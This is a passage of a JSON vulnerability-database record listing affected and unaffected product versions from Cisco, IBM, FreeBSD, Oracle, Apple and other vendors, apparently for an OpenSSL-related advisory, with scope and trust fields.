0.3, "vendor": "ibm", "version": "3.16" }, { "model": "unified contact center enterprise", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "88310" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.5" }, { "model": "intelligent automation for cloud", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "jabber guest", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.0(2)" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3361" }, { "model": "10.1-release-p5", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "unified ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "69010" }, { "model": "prime security manager", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9.5.4.3" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.13-34" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.1" }, { "model": "im and presence service", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.5" }, { "model": "ata analog telephone adaptor", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1879.2.5" }, { "model": "jabber guest", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ucs central 1.5", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "show and share", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5(2)" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.1" }, { "model": "real-time compression appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.2" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.4.0.1" }, { "model": "cloud manager with openstack interim fix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.0.3" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "prime license manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime collaboration deployment", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.5" }, { "model": "series ip phones vpn feature", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8800-11.5.2" }, { "model": "mobile foundation consumer edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.0.1" }, { "model": "web security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3394" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.2" }, { "model": "visual quality experience server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "filenet system monitor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "project openssl 1.0.1t", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "anyconnect secure mobility client for windows", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.3" }, { "model": "content security management appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "10.1-release-p28", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "agent for openflow", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.4.0" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.1" }, { "model": "image construction and composition tool", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.1.0" }, { "model": "webex recording playback client", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime collaboration assurance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "asa next-generation firewall services", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "9.3-release-p38", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "telepresence content server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tandberg codian mse model", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "83200" }, { "model": "local collector appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.2.8" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.11.2" }, { "model": "9.3-release-p10", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-release-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "digital media players series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "44000" }, { "model": "mds series multilayer switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "90008.3" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.16-37" }, { "model": "10.2-release-p13", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "nexus series switches 7.3.1nx", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5000" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1" }, { "model": "opensuse evergreen", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11.4" }, { "model": "prime infrastructure standalone plug and play gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "spa50x series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "webex meetings for blackberry", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tivoli netcool system service monitors interim fix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.014-01" }, { "model": "security identity manager virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.3" }, { "model": "lancope stealthwatch flowcollector sflow", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 1.0.1g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "media experience engines", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.5.1" }, { "model": "exalogic infrastructure", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "2.0" }, { "model": "tivoli netcool system service monitors fp1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3.0.4" }, { "model": "telepresence integrator c series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.3.7" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.5" }, { "model": "anyconnect secure mobility client", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.2" }, { "model": "wide area application services", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "datapower gateways", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.5.1.1" }, { "model": "workload deployer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "telepresence server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "87100" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3.0.1" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.4-23" }, { "model": "10.2-release-p14", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.1-release-p17", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.25-57" }, { "model": "sterling connect:express for unix ifix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.6.1146-109" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.18-43" }, { "model": "cloud manager with openstack interim fix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.5" }, { "model": "workload deployer if12", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.7" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "media services interface", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nexus intercloud", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1000v0" }, { "model": "media experience engines", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.5" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.0" }, { "model": "mediasense", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9.1" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.11.1" }, { "model": "ips", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 1.0.1i", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.4.2" }, { "model": "unified workforce optimization quality management sr3 es5", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.0" }, { "model": "qradar", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "meetingplace", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.7" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.0.1" }, { "model": "security identity manager virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.2" }, { "model": "commerce guided search", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.2" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.913" }, { "model": "unified attendant console advanced", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime access registrar", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.0.1.7" }, { "model": "anyconnect secure mobility client for ios", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.0" }, { "model": "webex messenger service ep1", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "7.9.9" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.11.3" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "mediasense", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.5.1" }, { "model": "unified ip phone 9.4.2sr3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8961" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.1.1" }, { "model": "10.2-release-p9", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "unified wireless ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 1.0.1s", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "10.1-release-p27", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "spa122 ata with router", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.4.5" }, { "model": "media experience engines", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.6" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.2" }, { "model": "webex meeting center", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.9.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "lancope stealthwatch flowcollector netflow", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.8.2" }, { "model": "webex node for mcs", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.12.9.8" }, { "model": "jabber for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video surveillance 4300e/4500e high-definition ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.2.8" }, { "model": "mobilefirst platform foundation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.0.0" }, { "model": "10.2-release-p6", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "cloud manager with openstack interix fix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.0.3" }, { "model": "unified sip proxy", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "virtual security gateway for microsoft hyper-v", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.2(1)" }, { "model": "tandberg codian isdn gw", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32100" }, { "model": "unified attendant console premium edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "digital media players series 5.4 rb", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4300" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.11-28" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1" }, { "model": "qradar", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.31" }, { "model": "prime optical for sps", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "pureapplication system", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "2.2.1" }, { "model": "abyp-2t-1s-1l-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "mds series multilayer switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "90006.2.17" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.19" }, { "model": "project openssl 1.0.1r", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "anyconnect secure mobility client for linux", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.3" }, { "model": "vm server for", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "x863.3" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.0.0" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.03" }, { "model": "aspera console", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.1.1" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.5.0.997" }, { "model": "anyconnect secure mobility client for os", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "x4.3" }, { "model": "unified ip phone series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "79000" }, { "model": "anyconnect secure mobility client for android", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.3" }, { "model": "lancope stealthwatch flowsensor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.0.0" }, { "model": "connected analytics for collaboration 1.0.1q", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.20" }, { "model": "jabber guest", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.0" }, { "model": "abyp-2t-1s-1l-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "show and share", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.2(2)" }, { "model": "lancope stealthwatch flowcollector sflow", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.7.3" }, { "model": "mmp server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "opensuse", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "13.2" }, { "model": "tivoli provisioning manager for images", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.19" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.30.0-13" }, { "model": "commerce guided search", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.1" }, { "model": "abyp-10g-2sr-2lr-1-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "tivoli provisioning manager for images build", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.20280.6" }, { "model": "computer telephony integration object server", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.51" }, { "model": "unified communications for microsoft lync", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "10.6.7" }, { "model": "prime security manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9.3.4.2-4" }, { "model": "anyres live", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "datapower gateways", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.14" }, { "model": "ons series multiservice provisioning platforms", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1545410.6.1" }, { "model": "telepresence isdn link", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence server", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "70104.4" }, { "model": "packet tracer", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.2" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.7.0" }, { "model": "openssh for gpfs for windows", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.5.0.31" }, { "model": "unified attendant console business edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "agent for openflow", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.0.7" }, { "model": "cloud manager with openstack interim fix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.5" }, { "model": "cognos business intelligence interim fix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.2.117" }, { "model": "unified contact center enterprise", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.51" }, { "model": "tandberg codian isdn gw", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32200" }, { "model": "show and share", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.2(3)" }, { "model": "globalprotect agent", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "3.1.0" }, { "model": "webex meetings for wp8", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.0" }, { "model": "peoplesoft enterprise peopletools", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "8.54" }, { "model": "abyp-2t-2s-0l-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "linux ia-64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "powerkvm", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "webex meetings for android", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9.1" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.5.0" }, { "model": "mds series multilayer switches 7.3.1nx", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9000" }, { "model": "mds series multilayer switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "90000" }, { "model": "ios software and cisco ios xe software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "16.3.1" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.2" }, { "model": "webex meeting center", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.9.0.5" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.15-36" }, { "model": "ace application control engine module", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "300" }, { "model": "lancope stealthwatch flowsensor", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.7.3" }, { "model": "exalogic infrastructure", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.0" }, { "model": "proventia network enterprise scanner", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.4" }, { "model": "tivoli provisioning manager for os deployment build", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.1.1051.08" }, { "model": "nac guest server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "local collector appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.2.10" }, { "model": "enterprise content delivery system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mediasense", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.5(1)" }, { "model": "email security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.11" }, { "model": "mobile foundation consumer edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.0.0" }, { "model": "prime collaboration deployment", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "webex meetings client hosted t31r1sp6", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "cloud manager with openstack interim fix1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3.0.6" }, { "model": "9.3-release-p35", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "dx series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "virtualization experience media engine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video surveillance series ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "60002.8" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3x000" }, { "model": "packet tracer", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.3" }, { "model": "unified sip proxy", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "10.0" }, { "model": "10.2-release-p10", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aspera shares", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.9.3" }, { "model": "abyp-0t-4s-0l-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.0.1" }, { "model": "spa50x series ip phones", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.6.5" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "abyp-4ts-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "emergency responder", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8.5" }, { "model": "ata series analog terminal adaptor", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1901.3" }, { "model": "commerce guided search", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.0" }, { "model": "digital media players series 5.4 rb", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4400" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.11.4" }, { "model": "virtualization experience media engine", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.5.1" }, { "model": "abyp-10g-4lr-1-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "telepresence server on multiparty media", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3200" }, { "model": "abyp-10g-4lr-1-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "video surveillance ptz ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.8" }, { "model": "9.3-release-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "emergency responder", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8.6" }, { "model": "unified communications for microsoft lync", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "jabber software development kit", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "spa122 ata with router", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "10.1-release-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-stable", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "tivoli composite application manager for transactions if03", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.4.0.1" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.4" }, { "model": "identity services engine", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.2.1" }, { "model": "commerce experience manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.2" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.1" }, { "model": "tivoli provisioning manager for os deployment build", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.151.05" }, { "model": "10.1-release-p9", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "webex meetings server", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.7" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.2.2" }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.5(2.10000.5)" }, { "model": "project openssl 1.0.1c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.1.0" }, { "model": "telepresence mx series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.3.7" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "telepresence server on multiparty media", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3204.4" }, { "model": "lancope stealthwatch flowcollector sflow", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.8" }, { "model": "qradar siem/qrif/qrm/qvm patch", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.2.71" }, { "model": "digital media players series 5.3 rb", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "4300" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1768" }, { "model": "telepresence profile series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.3.7" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.41" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.1" }, { "model": "openssh for gpfs for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5" }, { "model": "mac os", "scope": "ne", "trust": 0.3, "vendor": "apple", "version": "x10.11.6" }, { "model": "abyp-0t-0s-4l-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.5" }, { "model": "project openssl 1.0.1f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "nexus series switches 7.3.1nx", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7000" }, { "model": "jabber for android mr", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6" }, { "model": "project openssl 1.0.2a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "abyp-4t-0s-0l-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "algo audit and compliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "project openssl 1.0.2f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.5" }, { "model": "connected grid router-cgos", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.2919" }, { "model": "worklight enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.0" }, { "model": "lancope stealthwatch smc", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tivoli provisioning manager for images", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.0" }, { "model": "telepresence server on virtual machine mr2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.2" }, { "model": "anyconnect secure mobility client", "scope": 